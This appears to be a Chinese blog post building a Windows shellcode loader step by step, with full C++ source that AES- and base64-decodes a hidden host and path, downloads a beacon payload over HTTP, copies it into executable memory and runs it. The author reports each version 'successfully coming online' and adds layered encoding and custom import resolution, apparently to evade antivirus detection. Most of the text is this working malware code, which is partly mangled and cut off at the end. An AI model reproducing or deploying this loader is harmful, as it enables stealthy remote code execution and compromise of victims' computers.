AES+base64+远程加载----ConsoleApplication811项目

ConsoleApplication9.cpp

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int main()
{void* exec;int payload_len = 280000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHixxxx==";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "uMF83pA41Vm/UzOtowpaCA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);((void(*)())exec)();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

base64.cpp

#include"base64.h"
#include<assert.h>
#include<iostream>
const std::string ko::Base64::baseString =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
std::string ko::Base64::encode(const std::string& s) {unsigned char array3[3];unsigned char array4[4];unsigned group = s.length() / 3;unsigned remain = s.length() - 3 * group;int pos = 0;std::string ret;ret.reserve(4 * group + 4);for (int g = 0; g < group; ++g) {for (int i = 0; i < 3; ++i)array3[i] = s[pos++];array4[0] = (array3[0] & 0xFC) >> 2;array4[1] = ((array3[0] & 0x03) << 4) + ((array3[1] & 0xF0) >> 4);array4[2] = ((array3[1] & 0x0F) << 2) + ((array3[2] & 0xC0) >> 6);array4[3] = array3[2] & 0x3F;for (int i = 0; i < 4; ++i)ret.push_back(baseString[array4[i]]);}if (remain > 0) {for (int i = 0; i < remain; ++i)array3[i] = s[pos++];for (int i = remain; i < 4; ++i)array3[i] = 0;array4[0] = (array3[0] & 0xFC) >> 2;array4[1] = ((array3[0] & 0x03) << 4) + ((array3[1] & 0xF0) >> 4);array4[2] = ((array3[1] & 0x0F) << 2) + ((array3[2] & 0xC0) >> 6);array4[3] = array3[2] & 0x3F;for (int i = 0; i < remain + 1; ++i)ret.push_back(baseString[array4[i]]);for (int i = remain + 1; i < 4; ++i)ret.push_back('=');}return ret;
}
std::string ko::Base64::decode(const std::string& s) {unsigned char array3[3];unsigned char array4[4];unsigned group = s.length() / 4;const unsigned remain = s.length() - 4 * group;int pos = 0;std::string ret;ret.reserve(3 * group);assert(remain == 0);for (int g = 0; g < group; ++g) {for (int i = 0; i < 4; ++i)array4[i] = baseString.find(s[pos++]);array3[0] = (array4[0] << 2) + ((array4[1] & 0x30) >> 4);array3[1] = ((array4[1] & 0xf) << 4) + ((array4[2] & 0x3c) >> 2);array3[2] = ((array4[2] & 0x3) << 6) + array4[3];if (array4[2] == 255)ret.push_back(array3[0]);else if (array4[3] == 255) {ret.push_back(array3[0]);ret.push_back(array3[1]);}else {ret.push_back(array3[0]);ret.push_back(array3[1]);ret.push_back(array3[2]);}}return ret;
}

base64.h

#pragma once
#include<string>
namespace ko {class Base64 {private:static const std::string baseString;public:static std::string encode(const std::string& s);static std::string decode(const std::string& s);};
}

AES.h

//AES.h#ifndef _AES_H
#define _AES_H
#include <exception>
#include <cstring>
#include <string>
#define BLOCK_SIZE 16
using namespace std;class AES
{
public:enum{ECB = 0, CBC = 1, CFB = 2};private:enum{DEFAULT_BLOCK_SIZE = 16};enum{MAX_BLOCK_SIZE = 32, MAX_ROUNDS = 14, MAX_KC = 8, MAX_BC = 8};
public:AES();virtual ~AES();
private://Key Initialization Flagbool m_bKeyInit;//Encryption (m_Ke) round keyint m_Ke[MAX_ROUNDS + 1][MAX_BC];//Decryption (m_Kd) round keyint m_Kd[MAX_ROUNDS + 1][MAX_BC];//Key Lengthint m_keylength;//Block Sizeint m_blockSize;//Number of Roundsint m_iROUNDS;//Chain Blockchar m_chain0[MAX_BLOCK_SIZE];char m_chain[MAX_BLOCK_SIZE];//Auxiliary private use buffersint tk[MAX_KC];int a[MAX_BC];int t[MAX_BC];
private:void Xor(char* buff, char const* chain);void DefEncryptBlock(char const* in, char* result);void DefDecryptBlock(char const* in, char* result);void EncryptBlock(char const* in, char* result);void DecryptBlock(char const* in, char* result);
public:void MakeKey(char const* key, char const* chain, int keylength =DEFAULT_BLOCK_SIZE, int blockSize = DEFAULT_BLOCK_SIZE);void Encrypt(char const* in, char* result, size_t n, int iMode = ECB);void Decrypt(char const* in, char* result, size_t n, int iMode = ECB);
};#endif // __RIJNDAEL_H__

AES.cpp
太大了就不放了

效果:
在这里插入图片描述
在这里插入图片描述
可以看到成功上线

到这里我们的url达到了一个方式,就是AES下载beacon811.bin文件成功,既然请求地址成功AES+base64编码解码且成功下载了了,那么这一功能完成了,

我们接下来写文件内容加密和解密,因为是二进制文件,那么第一步先给他在服务端base64加密了,然后再木马中再进行解密,我们先来把他用base64打印出来,发现控制台看不到,那么我们写到一个文件看看
增加如下代码

std::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);
base64EncodedContent = ko::Base64::encode(base64EncodedContent);//Save the Base64-encoded content to a file
std::ofstream outFile("base64_encoded_content.txt", std::ios::out);
outFile << base64EncodedContent;
outFile.close();

注意用到outFile需要引入

#include <fstream>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到成功写入,那么我们怎么确定写入的是否就是我们shellcode进行base64编码后的内容
那么我们解密触发看看是否上线
将写入文件的注释掉,增加两行代码

base64EncodedContent = ko::Base64::decode(base64EncodedContent);((void(*)())exec)();

在这里插入图片描述
可以看到成功上线,nice

这一阶段的全部代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int main()
{void* exec;int payload_len = 280000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "uMF83pA41Vm/UzOtowpaCA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);base64EncodedContent = ko::Base64::encode(base64EncodedContent);base64DecodedContent = ko::Base64::decode(base64EncodedContent);((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

那么我们确定内容没问题接下来再此base64EncodedContent上改造加解密就可以了,因为是字符串形式,而不是难搞的二进制

但是到这里我发现我傻了,这样和base64根本没有关系,因为我调用的exec指针执行,还是之前内存中的东西,而不是base64编码后的进入内存,
那么我继续修改,目的是让我们得到的base64DecodedContent进行内存加载
在这里插入图片描述
在这里插入图片描述
可以看到成功上线
这里给出全部代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* exec;int payload_len = 280000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "uMF83pA41Vm/UzOtowpaCA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;base64EncodedContent = ko::Base64::encode(base64EncodedContent);base64DecodedContent = ko::Base64::decode(base64EncodedContent);void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (alloc == nullptr) {std::cerr << "Failed to allocate memory." << std::endl;return 1;}// Copy decoded content to allocated memorymemcpy(alloc, base64DecodedContent.data(), base64DecodedContent.size());// Execute the allocated contentvoid (*shellcode)() = reinterpret_cast<void(*)()>(alloc);shellcode();// Free the allocated memoryVirtualFree(alloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

那么我们直接来访问我们base64编译好的a.txt文件放到服务器上,远程加载试试
发现失败,我又进行了排查(通过写入文件数据是否一致进行排查)

    std::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;std::ofstream outFile("encoded_content.txt", std::ios::out);outFile << base64EncodedContent;outFile.close();

在这里插入图片描述
发现写出的文件0kb,我换成了123456编译后的base64,发现读取成功了,那么想到是长度影响的问题,那么我增大payload_len
,之前是280000,现在我改成500000
在这里插入图片描述
在这里插入图片描述

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* exec;int payload_len = 500000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "lTbb3qMe8NsPKPjzTRaEzg==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;std::ofstream outFile("encoded_content.txt", std::ios::out);outFile << base64EncodedContent;outFile.close();//base64EncodedContent = ko::Base64::encode(base64EncodedContent);//base64DecodedContent = ko::Base64::decode(base64EncodedContent);//void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//if (alloc == nullptr) {//    std::cerr << "Failed to allocate memory." << std::endl;//    return 1;//} Copy decoded content to allocated memory//memcpy(alloc, base64DecodedContent.data(), base64DecodedContent.size()); Execute the allocated content//void (*shellcode)() = reinterpret_cast<void(*)()>(alloc);//shellcode(); Free the allocated memory//VirtualFree(alloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

可以看到成功写入,那么我们再来修改成之前的代码,继续运行,
在这里插入图片描述
成功了,一路踩坑,不过这下好了
全代码(注释自己手动去掉就好)

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* exec;int payload_len = 500000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "lTbb3qMe8NsPKPjzTRaEzg==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;//base64EncodedContent = ko::Base64::encode(base64EncodedContent);base64DecodedContent = ko::Base64::decode(base64EncodedContent);void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (alloc == nullptr) {std::cerr << "Failed to allocate memory." << std::endl;return 1;}// Copy decoded content to allocated memorymemcpy(alloc, base64DecodedContent.data(), base64DecodedContent.size());// Execute the allocated contentvoid (*shellcode)() = reinterpret_cast<void(*)()>(alloc);shellcode();// Free the allocated memoryVirtualFree(alloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

那么按照这个套路继续写以下几个算法
增加AES算法
目前顺序,服务端base64+AES算法生成的aesencode.txt文件,那么木马解密写成先解密AES再解密base64
在这里插入图片描述
可以看到成功上线
增加的代码如下
在这里插入图片描述
到这里就完成了我们的AES+base64+远程加载(请求的地址进行了AES加密)
base64加密使用到的python代码
在这里插入图片描述
AES加密使用到的项目
在这里插入图片描述
目前全代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")typedef LPVOID(WINAPI* VirtualAllocT)(_In_opt_ LPVOID lpAddress,_In_     SIZE_T dwSize,_In_     DWORD flAllocationType,_In_     DWORD flProtect);typedef HINTERNET(WINAPI* InternetOpenW_T)(_In_opt_ LPCWSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCWSTR lpszProxy,_In_opt_ LPCWSTR lpszProxyBypass,_In_ DWORD dwFlags);typedef HINTERNET(WINAPI* InternetConnectW_T)(_In_ HINTERNET hInternet,_In_ LPCWSTR lpszServerName,_In_ INTERNET_PORT nServerPort,_In_opt_ LPCWSTR lpszUserName,_In_opt_ LPCWSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpOpenRequestW_T)(_In_ HINTERNET hConnect,_In_opt_ LPCWSTR lpszVerb,_In_opt_ LPCWSTR lpszObjectName,_In_opt_ LPCWSTR lpszVersion,_In_opt_ LPCWSTR lpszReferrer,_In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpSendRequestW_T)(_In_ HINTERNET hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);typedef HINTERNET(WINAPI* InternetReadFile_T)(_In_ HINTERNET hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);
FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {// Get the address of the module's PE headerBYTE* pImageBase = (BYTE*)hModule;IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);// Get the address of the export directoryIMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);if (strcmp(lpProcName, pName) == 0) {WORD ordinal = pAddressOfNameOrdinals[i];DWORD functionRVA = pAddressOfFunctions[ordinal];FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);return pFunction;}}return NULL;
}void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
